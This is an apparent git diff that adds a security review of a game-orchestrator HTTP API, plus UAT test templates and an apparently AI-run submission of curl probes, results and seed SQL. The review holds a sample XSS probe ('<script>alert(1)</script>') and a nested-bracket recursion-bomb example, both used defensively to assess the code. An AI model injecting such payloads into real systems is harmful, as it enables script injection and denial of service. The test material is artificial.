+This is a real signal but again dominated by the direct game list read (which also includes per-row `status`). Information leak is marginal beyond the existing TM-023 acknowledgement.
+
+**Severity: SEV-4.** See §Findings F4.
+
+---
+
+### Scenario 4 — Two-query race between COUNT(*) and SELECT
+**Walk.** `games.py:193-194`:
+
+```python
+count_row = await pool.read_one(count_sql, where_params)
+rows = await pool.read_all(rows_sql, rows_params)
+```
+
+Two separate awaits. Between them, an autocommit write from the scheduler (F12 cycle inserts/updates games rows) can commit. Concrete sequence:
+
+- t=0ms: COUNT(*) returns total=2600
+- t=10ms: scheduler INSERT INTO games (... new app_id ...) commits
+- t=20ms: SELECT returns 50 rows from a pool of 2601
+
+`meta.has_more = (offset + len(games) < total)` = `0 + 50 < 2600` = True. The new row may or may not appear in the page, depending on the sort order and the inserted row's title. The total reported is stale; the row may appear or be missed on the next page.
+
+Impact: a single eventually-consistent view. The user can refresh and get correct results. No data loss, no security boundary crossed. This is a standard read-committed snapshot consistency artifact in a non-transactional read pattern.
+
+If the pool used a single transaction wrapping both queries (BEGIN; COUNT; SELECT; COMMIT), we'd get consistent reads. The BL4 pool doesn't expose multi-query transactions for reads, and the spec accepts eventual consistency. Phase 3 hardening could wrap both in `BEGIN DEFERRED ... COMMIT` if needed.
+
+**Verdict: PARTIAL.** UX nit, not a security issue. See §Findings F5.
+
+---
+
+### Scenario 5 — JSON-bomb / billion-laughs in `metadata` column
+**Walk.** `games.py:208`:
+
+```python
+parsed = json.loads(raw_meta)
+metadata = parsed if isinstance(parsed, dict) else None
+```
+
+Python's `json.loads` does NOT support entity expansion (that's an XML concern; JSON has no entity references). The "JSON bomb" surface in CPython is:
+
+1. **Deeply nested arrays/objects** — Python's recursion limit (default 1000). `json.loads("[" * 5000)` raises `RecursionError`. Caught by the `except (json.JSONDecodeError, TypeError)` clause? **NO — `RecursionError` is a `RuntimeError`, not in the except tuple.** The exception propagates up. BL5 doesn't have a global exception handler that returns a sanitized 500; FastAPI's default 500 handler returns `{"detail": "Internal Server Error"}` — no stack trace (TM-011 covered). Operator-side: a 500 reaches the client; a structured ERROR log fires with traceback (per ID3 logging chain). No data corruption.
+
+2. **Huge but shallow string** — Python parses linearly. A 100 MB metadata blob is the harder hit. The metadata column is TEXT with no length cap in the schema. If a malicious upstream (Steam manifest) writes 100 MB into `metadata`, the parse takes seconds and consumes ~3× memory. On DXP4800 with 8 GB RAM and 10 concurrent pool connections, 10 parallel requests fetching 100 MB metadata = 3 GB transient — concerning but not crashing.
+
+3. **Resource cap absent.** No `MAX_METADATA_BYTES` check before `json.loads`. The router pulls `raw_meta` from the row and parses unconditionally.
+
+How does a hostile metadata value get into the column? The `metadata` column is written by the orchestrator's own data layer (F5/F6 manifest ingestion); a hostile upstream (TM-007) could ship a manifest that causes a large value to be written. The manifest-fetch path has a 128 MiB cap (DQ7) so 100 MB is in-bounds for what could end up in `metadata`.
+
+**Severity: SEV-3.** A 100 MB metadata row + a `?status=...` filter that happens to include it = a large, slow response. RecursionError on nested-array metadata is uncaught and bubbles to a 500. See §Findings F6.
+
+---
+
+### Scenario 6 — Tie-breaker dedup case sensitivity (`?sort=ID:asc`)
+**Walk.** `_query_helpers.py:274`:
+
+```python
+if field_name not in allow_list.fields:
+    raise QueryParamError(f"{field_name!r} is not a sortable field")
+```
+
+`field_name` = "ID" (uppercase). `GAMES_SORT_ALLOW_LIST.fields = {"id","title","status","size_bytes","last_prefilled_at","last_validated_at"}` — set lookup is case-sensitive. "ID" not in fields → 400. Good: rejected, not silently treated as a different identifier. The de-dup logic is therefore never reached with a mis-cased value.
+
+But what about a duplicate-direction attack? `?sort=id:asc,id:desc`. Both entries pass allow-list. The tie-breaker check (`any(s.field == tie_breaker.field for s in user_sort)`) sees `id` in user_sort and SKIPS appending. ORDER BY becomes `id ASC, id DESC` — SQLite uses the first only (deterministic). De-dup is preserved.
+
+What about `?sort=id:asc,title:asc` (user explicitly sorts by id then title)? Tie-breaker = id, found in user_sort, not appended. ORDER BY = `id ASC, title ASC`. The tie-breaker on `id` is implicit. Fine.
+
+Edge: `?sort=id` (no direction) → defaults to asc, allow-list passes, tie-breaker dedup works. Good.
+
+**Verdict: MITIGATED.** Case-sensitive set lookup is the right behavior here.
+
+---
+
+### Scenario 7 — OpenAPI schema exposure
+**Walk.** `/api/v1/openapi.json` is loopback-only per `LOOPBACK_ONLY_PATTERNS`. An attacker from the LAN can't reach it. But — what does it now expose to a loopback caller (a local sibling process) about BL6+BL7?
+
+For BL7 the schema includes:
+- Path: `/api/v1/games`
+- Parameters: only those declared with `Query()` decorators — and the router uses `request.query_params` directly, not declared parameters. So the OpenAPI schema for BL7 has ZERO parameter documentation. The filter/sort allow-list is NOT in the rendered schema. Auditor verifies: `games.py:159-162` declares only `request: Request` and `pool: Pool`. No `Query()` params.
+
+This is a quirk worth noting: the OpenAPI schema doesn't describe the filter/sort syntax at all. Operators discovering the API via Swagger UI will see "no params" and won't know `?platform=steam` is valid. This is documentation debt, not a security issue. From a security standpoint, the lack of schema documentation is actually a (minor, marginal) defense — the allow-list isn't exposed via OpenAPI.
+
+Response models ARE exposed (GameResponse, GamesMeta, FilterCriterion). Field names of the response = column names of the games table. So a loopback caller learns the wire schema — but loopback is the trust boundary, and the wire schema is also visible from any successful 200 response.
+
+**Verdict: MITIGATED.** Worth noting in docs but not a security finding.
+
+---
+
+### Scenario 8 — `applied_filters` echo as a stored-XSS vector for Game_shelf
+**Walk.** The orchestrator returns:
+
+```json
+{"meta": {"applied_filters": {"platform": {"eq": "<script>alert(1)</script>"}}}}
+```
+
+if the attacker (with bearer) sends `?platform=<script>alert(1)</script>`. Server-side the orchestrator is fine — content-type is `application/json`, no HTML rendering happens here. But: Game_shelf (the consumer) renders `applied_filters` in its UI. If Game_shelf inserts the value into the DOM via `innerHTML` rather than `textContent`, the attacker has injected JS into the Game_shelf operator's browser session.
+
+To exploit, the attacker needs:
+1. The bearer token (TM-023 step 4-5 already grants it).
+2. The operator to be browsing Game_shelf at a moment when the attacker's request's `applied_filters` echo is rendered.
+
+The orchestrator does not return the attacker's request to the operator's browser. The attacker has to wait until the operator triggers a query whose echo happens to match — which means the attacker has to influence what the operator's browser fetches. Practical exploitation requires Game_shelf to render attacker-controlled filter values, which generally doesn't happen unless Game_shelf has its own URL-driven filter feature whose params come from user-supplied links (e.g., bookmarkable filter URLs). Plausible in TanStack-Query UIs.
+
+This is fundamentally a Game_shelf concern. The orchestrator's responsibility is to return JSON with consistent encoding (which it does — `JSONResponse` escapes `<` `>` etc. correctly for JSON). Cross-system, flag as integration concern.
+
+**Verdict: N/A at the orchestrator layer; flag for Game_shelf.** See §Findings F7.
+
+---
+
+## Findings
+
+### SEV-1
+**None.**
+
+### SEV-2
+**None.**
+
+### SEV-3
+
+**F6 — `metadata` JSON parse has no size cap and uncaught `RecursionError`.**
+- **Location:** `src/orchestrator/api/routers/games.py:206-215`
+- **Walk:** `json.loads(raw_meta)` is called on a `TEXT` column with no length cap. The `except` tuple catches `JSONDecodeError, TypeError` but NOT `RecursionError`. A deeply nested JSON array in the metadata column (5,000+ open brackets) raises `RecursionError`, which bubbles to FastAPI's default 500 handler — every `GET /api/v1/games` page including that row will 500 until the row is repaired. Large but shallow metadata (100 MB) causes a slow parse + ~3× memory transient.
+- **Recommendation:** (1) Add `len(raw_meta) > MAX_METADATA_BYTES` short-circuit (suggest 1 MiB) → fall back to `metadata=None` + structured log. (2) Catch `RecursionError` in the except tuple. (3) Optionally use `json.JSONDecoder(strict=True)` with a max-depth wrapper.
+- **Severity:** SEV-3 — requires a malicious or corrupt metadata row to trigger; metadata is written by the orchestrator's own data layer; LAN trust boundary mitigates external entry. But the 500 fallout is operator-impacting.
+
+### SEV-4
+
+**F1 — Filter allow-list enumerable via 400 messages.** Dominated by source-code visibility (open-source repo); accepted disclosure. No remediation.
+
+**F2 — Sustained-slowdown via uncovered sort/filter columns.** BL7 allow-lists `last_validated_at` and `last_prefilled_at` filters but no schema index exists on those columns. At 1M-row scale, a hot-loop of such filtered queries will saturate the aiosqlite pool. Phase 3 hardening — add covering indexes or remove these from the filter allow-list.
+
+**F3 — `applied_filters` echo enables a binary-search size-distribution oracle.** Dominated by the direct list read with the same bearer. Would become real if a future read-only sub-token role is introduced.
+
+**F4 — `meta.total` per status reveals operator activity windows (notably `status=downloading`).** Dominated by the direct list read. Same future-token caveat.
+
+**F5 — Two-query COUNT+SELECT race produces eventual-consistency artifacts.** Read-side staleness only; no security boundary crossed. UX nit. Phase 3 hardening could wrap both queries in a deferred read transaction.
+
+**F7 — `applied_filters` echo is a potential XSS vector for downstream JSON consumers (Game_shelf).** Server-side responsibility ends at correct JSON encoding (orchestrator's `JSONResponse` is correct). Cross-system integration concern — Game_shelf must use `textContent` (or React's auto-escaping default) when rendering echoed values. Document in HANDOFF or Game_shelf integration notes.
+
+---
+
+## Non-findings
+
+- **No SQL injection** — values parameter-bound, identifiers allow-list-validated. Property-test pinned.
+- **No auth bypass on BL6/BL7** — neither path is in `AUTH_EXEMPT_PATHS`; substring evasion blocked by UAT-3 S2-A.
+- **No CORS regression** — CORS-outermost stack inherited via `app.include_router(...)`; no per-router override.
+- **No correlation_id injection** — UUIDv4 strict regex regenerates malformed input; BL6/BL7 inherit via middleware stack.
+- **No oversized-body vector on GET** — handlers don't materialize bodies; 32 KiB cap enforced regardless.
+- **No log-side credential leak** — neither router logs row content; `metadata_parse_failed` logs only `game_id`.
+- **No stack-trace disclosure** — 503 path returns `{"detail": "database unavailable"}`; 500 path returns generic detail.
+- **No OpenAPI schema leak to LAN** — `/api/v1/openapi.json` is loopback-only; furthermore the schema doesn't document the filter/sort allow-list (handler reads `request.query_params` rather than declaring `Query()` params).
+- **Tie-breaker de-dup case sensitivity is correct** — `?sort=ID:asc` is rejected as not-sortable, never silently treated as a separate field.

--- a/tests/uat/sessions/2026-05-20-session-4/submissions/test-session-4-v1.md
+++ b/tests/uat/sessions/2026-05-20-session-4/submissions/test-session-4-v1.md
@@ -1,0 +1,113 @@
+# UAT Test Session — 4 (v1) — SUBMISSION
+
+**Date run:** 2026-05-20
+**Tester:** Claude (autonomous; user granted full autonomy)
+**Format:** H-1 lightweight (HTTP API surface, manual `curl` flows)
+
+---
+
+## Pre-flight: PASS
+
+- P1-P5: env active, branch `feat/uat-4-session`, working tree clean (only state files), test baseline green (457 project tests)
+- P6: `ORCH_TOKEN`=32×'a', `ORCH_DATABASE_PATH=/tmp/uat4.db` (fresh)
+- P7: migrations applied, `applied_count=1`
+- P8: 30 games seeded (15 steam + 15 epic; all 8 status enum values represented; sizes 1.5GB-122GB; last_prefilled_at populated for ~half)
+
+---
+
+## Scenario 1 — uvicorn boot + 3 routers wired: PASS
+
+- 1.1 Startup: `pool_initialized`, `api.boot.complete`, `Application startup complete` ✓
+- 1.2 `/api/v1/openapi.json` paths: exactly `["/api/v1/games", "/api/v1/health", "/api/v1/platforms"]` ✓
+- 1.3 Token leak grep: 0 hits ✓
+
+---
+
+## Scenario 2 — `/api/v1/platforms` regression: PASS
+
+- 2.1 Order: steam first, epic second ✓ (BL6 D4)
+- 2.2 Unauth: 401 ✓
+- 2.3 Keys: `[auth_expires_at, auth_method, auth_status, last_error, last_sync_at, name]` — `config` NOT present ✓ (BL6 D1)
+
+---
+
+## Scenario 3 — `/api/v1/games` pagination: PASS
+
+- 3.1 No params → 30 games, meta: `{total: 30, limit: 50, offset: 0, has_more: false}` ✓
+- 3.2 `limit=5` → 5 games, `has_more: true` ✓
+- 3.3 `limit=5&offset=5` → 5 games, `offset: 5` ✓
+- 3.4 `limit=1000` → **400** with `{"detail": "limit must be <= 500, got 1000"}` ✓
+
+---
+
+## Scenario 4 — `/api/v1/games` filter + sort: PASS
+
+- 4.1 `platform=steam` → `["steam"]` only ✓
+- 4.2 `status_in=not_downloaded,up_to_date` → exactly `["not_downloaded", "up_to_date"]` ✓
+- 4.3 `size_bytes_gte=10000000000&size_bytes_lte=50000000000` → min=12e9, max=50e9 ✓ (within bounds)
+- 4.4 `sort=title:desc` top 3 → Witcher 3 B&W, The Witcher 3, The Last of Us ✓ (reverse-alpha)
+- 4.5 `sort=size_bytes:desc,title:asc` `applied_sort` → 3 entries: `[size_bytes:desc, title:asc, id:asc]` ✓ (tie-breaker appended)
+
+---
+
+## Scenario 5 — `/api/v1/games` error paths + UAT-4 candidate-bug confirmation: PARTIAL (3 bugs confirmed)
+
+| # | Test | Expected | Actual | Verdict |
+|---|---|---|---|---|
+| 5.1 | unknown filter field → 400 | 400 | 400 | ✓ |
+| 5.2 | unknown op → 400 | 400 | 400 | ✓ |
+| 5.3 | invalid value → 400 | 400 | 400 | ✓ |
+| 5.4 | unauth → 401 | 401 | 401 | ✓ |
+| **5.5** | **S2-B candidate**: `?sort=,,,` → expected `[title:asc, id:asc]` (default+tie-breaker); bug = only `[id:asc]` | `[id:asc]` only | `[{"field": "id", "direction": "asc"}]` | **BUG CONFIRMED** |
+| **5.6** | **S2-D candidate**: `?size_bytes_gte=` + 25 nines → expected 400; bug = 500 | 500 | `500 Internal Server Error` | **BUG CONFIRMED** |
+| **5.7** | **S2-A candidate**: `?platform=steam` `applied_filters` → expected compact `{platform: {eq: steam}}`; bug = all 7 op keys with 6 nulls | bug expected | `{"platform": {"eq": "steam", "in": null, "gte": null, "lte": null, "gt": null, "lt": null, "ne": null}}` | **BUG CONFIRMED** |
+
+All three SEV-2 candidates empirically confirmed live.
+
+---
+
+## Scenario 6 — Loopback-only schema/UI (UAT-3 regression): PASS
+
+Server restarted on `--host 0.0.0.0 --port 8765`. LAN IP: `192.168.1.192`.
+
+| # | Test | Expected | Actual | Verdict |
+|---|---|---|---|---|
+| 6.1 | LAN `/api/v1/openapi.json` | 403 | 403 | ✓ |
+| 6.2 | LAN `/api/v1/docs` | 403 | 403 | ✓ |
+| 6.3 | LAN `/api/v1/games` (auth'd) | 200 (games not loopback-only) | 200 | ✓ |
+| 6.4 | `api.boot.non_loopback_bind_warning` event in log | present | present, with full hint message | ✓ |
+
+UAT-3 S2-C, S2-D, S3-h regressions all hold under BL6+BL7 surface.
+
+---
+
+## Scenario 7 — Correlation ID propagation (UAT-3 regression): PASS
+
+- 7.1 Echo header present: `1fcca71e-d49c-446d-b1f7-1b734756ce38` (UUID4-shape) ✓
+- 7.2 Repeat: different UUID `266c25b3-1109-45c7-9714-6d0fc1a64436` (server-generated each request) ✓
+- 7.3 Client-supplied `X-Correlation-ID: my-test-id-12345` → server returned `6ae05923-...` instead. Client value IGNORED ✓ (UAT-3 F-9 mitigation holds)
+
+---
+
+## Scenario 8 — `/api/v1/games` pool-failure path: PASS (covered by unit test)
+
+Skipped manual probe — `TestGamesPoolFailure::test_pool_error_returns_503` in `tests/api/test_games_router.py` covers this with full assertion on 503 + log shape.
+
+---
+
+## Bugs Found (live-confirmed during this session)
+
+| ID | Scenario | Severity | Description | Repro |
+|---|---|---|---|---|
+| **S2-A** | 5.7 | SEV-2 | `applied_filters` echo emits all 7 op keys per filtered field with 6 null values, instead of the compact `{op: value}` shape from spec §3.2 | `curl -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?platform=steam&limit=3" \| jq '.meta.applied_filters'` |
+| **S2-B** | 5.5 | SEV-2 | `?sort=,,,` silently drops the default sort; only the tie-breaker `id:asc` survives. Parser enters user-sort branch on non-empty string, comma-split produces only empty entries, loop adds nothing, default never applied | `curl -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?sort=,,,&limit=3" \| jq '.meta.applied_sort'` |
+| **S2-D** | 5.6 | SEV-2 | Oversized integer (`size_bytes_gte` = 25 nines) parses as Python int (no overflow), binds to SQLite, raises OverflowError → uncaught → FastAPI 500 instead of 400 with structured error | `curl ... "http://127.0.0.1:8765/api/v1/games?size_bytes_gte=99999999999999999999999"` returns `500 Internal Server Error` |
+
+---
+
+## Tester Notes
+
+- UAT-4 agent findings empirically confirmed live for all 3 SEV-2 candidate bugs (S2-A, S2-B, S2-D). S2-C (`_in` cardinality) not probed manually — would need to send 1000+ values; trust the agent walk + reproduce with a regression test during remediation.
+- All UAT-3 regressions (CORS outermost, non-loopback warn, loopback schema gate, correlation_id regeneration) hold under BL6+BL7 substrate.
+- Test suite at 457 passing; this manual session adds wire-level confirmation that the unit tests model real behavior accurately.
+- Scenario 5.6 (oversized int) also produces a stack trace in server logs (not visible at HTTP layer); fix should catch OverflowError at the parameter binding boundary in `_query_helpers._coerce_value` and re-raise as `QueryParamError`.

--- a/tests/uat/sessions/2026-05-20-session-4/templates/test-session-4-v1.md
+++ b/tests/uat/sessions/2026-05-20-session-4/templates/test-session-4-v1.md
@@ -1,0 +1,216 @@
+# UAT Test Session — 4 (v1)
+
+**Date:** 2026-05-20
+**Features Under Test:** BL6 (`/api/v1/platforms`) + BL7 (`/api/v1/games` + `_query_helpers.py`)
+**Tester:** Karl (Orchestrator)
+**Format:** H-1 lightweight (HTTP API surface, manual `curl` flows)
+
+---
+
+## Instructions
+
+1. Open two terminals from project root inside the venv: `source .venv/bin/activate`.
+2. **Terminal A** runs the server. **Terminal B** runs the curl probes.
+3. Mark Pass/Fail per row.
+4. If Fail: fill in the Bugs Found table at the bottom.
+5. When done, save this file to `tests/uat/sessions/2026-05-20-session-4/submissions/test-session-4-v1.md` and tell the Orchestrator agent "results are in".
+
+> `/api/v1/health` returns **503 by design** in pre-validator state (Bible §8.4). 503 is PASS.
+
+---
+
+## Pre-flight
+
+| # | Check | Command | Expected |
+|---|---|---|---|
+| P1 | venv active (both terminals) | `which python` | `.../lancache_orchestrator/.venv/bin/python` |
+| P2 | branch | `git branch --show-current` | `feat/uat-4-session` |
+| P3 | clean tree | `git status --short` | (empty or only `M .claude/process-state.json`) |
+| P4 | API test baseline | `pytest tests/api/ -q` | ~138 pass (76 BL5/UAT-3 + 23 BL6 + 38 BL7 + 1 router-list) |
+| P5 | full suite green | `pytest -q` | 457 pass |
+| P6 | configure test token + DB | `export ORCH_TOKEN=$(printf 'a%.0s' {1..32}); export ORCH_DATABASE_PATH=/tmp/uat4.db; rm -f $ORCH_DATABASE_PATH` | (no output) |
+| P7 | seed migration | `python -m orchestrator.db.migrate "$ORCH_DATABASE_PATH"` | exit 0; `applied_count=1` |
+| P8 | seed some game data | (see Appendix A — paste the SQL block) | inserts ~30 games across platforms/statuses |
+
+Pre-flight all-pass: ☐
+
+---
+
+## Scenario 1 — uvicorn boot, all 3 routers wired
+
+Terminal A:
+```
+uvicorn orchestrator.api.main:app --host 127.0.0.1 --port 8765 --log-level info
+```
+
+| Step | Check | Expected |
+|---|---|---|
+| 1.1 | startup logs | sees `pool_initialized` and Application startup complete |
+| 1.2 | OpenAPI schema (Terminal B): `curl -s http://127.0.0.1:8765/api/v1/openapi.json \| jq '.paths \| keys'` | array containing `/api/v1/health`, `/api/v1/platforms`, `/api/v1/games` |
+| 1.3 | no token leak in startup | grep stdout for the literal 32-char token → 0 hits |
+
+Pass / Fail: ☐
+
+---
+
+## Scenario 2 — `/api/v1/platforms` regression smoke
+
+Terminal B (`T=$ORCH_TOKEN`):
+| Step | Command | Expected |
+|---|---|---|
+| 2.1 | `curl -s -H "Authorization: Bearer $T" http://127.0.0.1:8765/api/v1/platforms \| jq '.platforms[].name'` | `"steam"` then `"epic"` (steam first per BL6 D4) |
+| 2.2 | unauthenticated | `curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:8765/api/v1/platforms` → `401` |
+| 2.3 | config NOT in response | `curl -s -H "Authorization: Bearer $T" http://127.0.0.1:8765/api/v1/platforms \| jq '.platforms[0] \| keys'` → no `config` key |
+
+Pass / Fail: ☐
+
+---
+
+## Scenario 3 — `/api/v1/games` happy path + pagination
+
+| Step | Command | Expected |
+|---|---|---|
+| 3.1 default | `curl -s -H "Authorization: Bearer $T" http://127.0.0.1:8765/api/v1/games \| jq '.games \| length, .meta'` | `30` games, meta with `total: 30`, `limit: 50`, `offset: 0`, `has_more: false` |
+| 3.2 explicit limit | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?limit=5" \| jq '.games \| length, .meta.has_more'` | `5`, `true` |
+| 3.3 offset | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?limit=5&offset=5" \| jq '.games \| length, .meta.offset'` | `5`, `5` |
+| 3.4 limit cap | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?limit=1000" -w '%{http_code}\n' -o /tmp/uat4.out; cat /tmp/uat4.out` | `400`, body contains `"limit"` |
+
+Pass / Fail: ☐
+
+---
+
+## Scenario 4 — `/api/v1/games` filter + sort
+
+| Step | Command | Expected |
+|---|---|---|
+| 4.1 platform filter | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?platform=steam&limit=500" \| jq '[.games[].platform] \| unique'` | `["steam"]` only |
+| 4.2 status multi | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?status_in=not_downloaded,up_to_date&limit=500" \| jq '[.games[].status] \| unique \| sort'` | exactly `["not_downloaded", "up_to_date"]` |
+| 4.3 size range | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?size_bytes_gte=10000000000&size_bytes_lte=50000000000&limit=500" \| jq '[.games[].size_bytes] \| min, max'` | both between 10e9 and 50e9 |
+| 4.4 sort desc | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?sort=title:desc&limit=500" \| jq '[.games[].title][:3]'` | titles in reverse alphabetical |
+| 4.5 multi-sort | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?sort=size_bytes:desc,title:asc&limit=500" \| jq '.meta.applied_sort'` | 3 entries: size_bytes:desc, title:asc, id:asc (tie-breaker appended) |
+
+Pass / Fail: ☐
+
+---
+
+## Scenario 5 — `/api/v1/games` error paths (UAT-3 lessons + UAT-4 candidates)
+
+| Step | Command | Expected | Records |
+|---|---|---|---|
+| 5.1 unknown filter | `curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?password=foo"` | `400` |  |
+| 5.2 unknown operator | `curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?platform_gte=foo"` | `400` |  |
+| 5.3 invalid value | `curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?size_bytes_gte=abc"` | `400` |  |
+| 5.4 unauth | `curl -s -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:8765/api/v1/games"` | `401` |  |
+| 5.5 **UAT-4 S2-B: empty-sort silent-drop** | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?sort=,,,&limit=3" \| jq '.meta.applied_sort'` | **CANDIDATE BUG**: should be `[{title:asc}, {id:asc}]` (defaults); UAT-4 found only `[{id:asc}]` (tie-breaker only) | record actual: ___ |
+| 5.6 **UAT-4 S2-D: oversized int** | `curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?size_bytes_gte=99999999999999999999999"` | **CANDIDATE BUG**: should be `400` (UAT-4 found `500` due to SQLite OverflowError) | record actual: ___ |
+| 5.7 **UAT-4 S2-A: applied_filters wire format** | `curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:8765/api/v1/games?platform=steam&limit=3" \| jq '.meta.applied_filters'` | **CANDIDATE BUG**: should be `{"platform": {"eq": "steam"}}` per spec; UAT-4 found 7 keys per filtered field with 6 nulls | record actual:<br><br>``` <br>(paste here) <br>``` |
+
+Pass / Fail: ☐
+(Note: 5.5/5.6/5.7 marked "candidate bug" → confirm-or-deny in live; PASS = bug confirmed, evidence captured.)
+
+---
+
+## Scenario 6 — Loopback-only schema/UI (UAT-3 regression)
+
+Stop Terminal A, restart with `--host 0.0.0.0 --port 8765`. Get LAN_IP via `LAN_IP=$(ipconfig getifaddr en0)`.
+
+| Step | Command | Expected |
+|---|---|---|
+| 6.1 LAN openapi | `curl -s -o /dev/null -w '%{http_code}\n' "http://$LAN_IP:8765/api/v1/openapi.json"` | `403` (UAT-3 S2-C still mitigated) |
+| 6.2 LAN docs | `curl -s -o /dev/null -w '%{http_code}\n' "http://$LAN_IP:8765/api/v1/docs"` | `403` |
+| 6.3 LAN games | `curl -s -o /dev/null -w '%{http_code}\n' -H "Authorization: Bearer $T" "http://$LAN_IP:8765/api/v1/games"` | `200` (games is NOT loopback-only — only auth-required) |
+| 6.4 non-loopback bind warning | (check Terminal A startup logs) | `api.boot.non_loopback_bind_warning` event present |
+
+Pass / Fail: ☐
+
+After 6.x, stop server and restart on `--host 127.0.0.1` for remaining scenarios.
+
+---
+
+## Scenario 7 — Correlation ID propagation (UAT-3 regression)
+
+| Step | Command | Expected |
+|---|---|---|
+| 7.1 echo | `curl -sI -H "Authorization: Bearer $T" http://127.0.0.1:8765/api/v1/games \| grep -i x-correlation-id` | header present, UUID-shaped |
+| 7.2 server-generated | repeat without `-H "X-Correlation-ID: ..."` | UUID still present (server generates) |
+| 7.3 client value ignored | `curl -sI -H "Authorization: Bearer $T" -H "X-Correlation-ID: my-test-id" http://127.0.0.1:8765/api/v1/games \| grep -i x-correlation-id` | server-generated UUID, NOT `my-test-id` |
+
+Pass / Fail: ☐
+
+---
+
+## Scenario 8 — `/api/v1/games` pool-failure path
+
+Stop server. Then start with a path that will fail mid-request (no easy way to simulate pool failure for /games without DB tampering; skip this and rely on the existing unit test `TestGamesPoolFailure::test_pool_error_returns_503`).
+
+| Step | Check | Expected |
+|---|---|---|
+| 8.1 | (skip — covered by unit test) | n/a |
+
+Pass / Fail: ☐ (auto-pass — covered by unit test)
+
+---
+
+## Bugs Found
+
+| ID | Scenario | Severity | Description | Repro |
+|---|---|---|---|---|
+| | | | | |
+
+---
+
+## Tester Notes
+
+(free-form: anything surprising, slow, awkward)
+
+---
+
+## Cleanup
+
+```
+# Ctrl-C in Terminal A
+rm -f /tmp/uat4.db /tmp/uat4.out
+unset ORCH_TOKEN ORCH_DATABASE_PATH
+```
+
+---
+
+## Appendix A — Game seed SQL
+
+Paste into a `sqlite3` session against `$ORCH_DATABASE_PATH`:
+
+```sql
+INSERT INTO games (platform, app_id, title, owned, size_bytes, status, last_prefilled_at, metadata) VALUES
+  ('steam', '10', 'Counter-Strike', 1, 5000000000, 'up_to_date', '2026-05-15T00:00:00Z', '{"depots":[101]}'),
+  ('steam', '440', 'Team Fortress 2', 1, 25000000000, 'up_to_date', '2026-05-10T00:00:00Z', '{"depots":[441]}'),
+  ('steam', '570', 'Dota 2', 1, 75000000000, 'pending_update', '2026-05-08T00:00:00Z', '{"depots":[571]}'),
+  ('steam', '730', 'CS:GO 2', 1, 35000000000, 'not_downloaded', NULL, '{"depots":[731]}'),
+  ('steam', '1086940', 'Baldur''s Gate 3', 1, 122000000000, 'up_to_date', '2026-05-18T00:00:00Z', '{"depots":[1086941,1086942]}'),
+  ('steam', '292030', 'The Witcher 3', 1, 50000000000, 'up_to_date', '2026-05-12T00:00:00Z', '{"depots":[292031]}'),
+  ('steam', '1245620', 'Elden Ring', 1, 60000000000, 'pending_update', NULL, '{"depots":[1245621]}'),
+  ('steam', '578080', 'PUBG', 1, 30000000000, 'blocked', NULL, '{"depots":[578081]}'),
+  ('steam', '2050650', 'Resident Evil 4', 0, 40000000000, 'not_downloaded', NULL, '{"depots":[2050651]}'),
+  ('steam', '292030.dlc', 'Witcher 3 — Blood and Wine', 1, 20000000000, 'up_to_date', '2026-05-12T00:00:00Z', '{"depots":[292032]}'),
+  ('steam', '108600', 'Project Zomboid', 1, 5000000000, 'failed', NULL, '{"depots":[108601]}'),
+  ('steam', '1888930', 'The Last of Us', 1, 80000000000, 'downloading', NULL, '{"depots":[1888931]}'),
+  ('steam', '413150', 'Stardew Valley', 1, 1500000000, 'up_to_date', '2026-05-19T00:00:00Z', '{"depots":[413151]}'),
+  ('steam', '1366540', 'Dyson Sphere Program', 1, 4000000000, 'up_to_date', '2026-05-17T00:00:00Z', '{"depots":[1366541]}'),
+  ('steam', '281990', 'Stellaris', 1, 15000000000, 'pending_update', NULL, '{"depots":[281991]}'),
+  ('epic', 'fortnite', 'Fortnite', 1, 30000000000, 'up_to_date', '2026-05-16T00:00:00Z', '{"build_version":"++Fortnite+Release-30.20"}'),
+  ('epic', 'rocketleague', 'Rocket League', 1, 25000000000, 'up_to_date', '2026-05-14T00:00:00Z', '{"build_version":"v2.40"}'),
+  ('epic', 'gtav', 'GTA V', 1, 95000000000, 'not_downloaded', NULL, '{"build_version":"1.0.3258.0"}'),
+  ('epic', 'cyberpunk', 'Cyberpunk 2077', 1, 80000000000, 'pending_update', NULL, '{"build_version":"2.13"}'),
+  ('epic', 'control', 'Control', 1, 45000000000, 'up_to_date', '2026-05-09T00:00:00Z', '{"build_version":"1.13"}'),
+  ('epic', 'borderlands3', 'Borderlands 3', 1, 75000000000, 'blocked', NULL, '{"build_version":"6.0"}'),
+  ('epic', 'civ6', 'Civilization VI', 1, 20000000000, 'up_to_date', '2026-05-11T00:00:00Z', '{"build_version":"1.0.13.5"}'),
+  ('epic', 'metro', 'Metro Exodus', 1, 55000000000, 'failed', NULL, '{"build_version":"1.4.0.18"}'),
+  ('epic', 'subnautica', 'Subnautica', 1, 12000000000, 'up_to_date', '2026-05-13T00:00:00Z', '{"build_version":"75788"}'),
+  ('epic', 'satisfactory', 'Satisfactory', 1, 25000000000, 'pending_update', NULL, '{"build_version":"1.0.0.4"}'),
+  ('epic', 'hades', 'Hades', 1, 18000000000, 'up_to_date', '2026-05-15T00:00:00Z', '{"build_version":"v1.39032"}'),
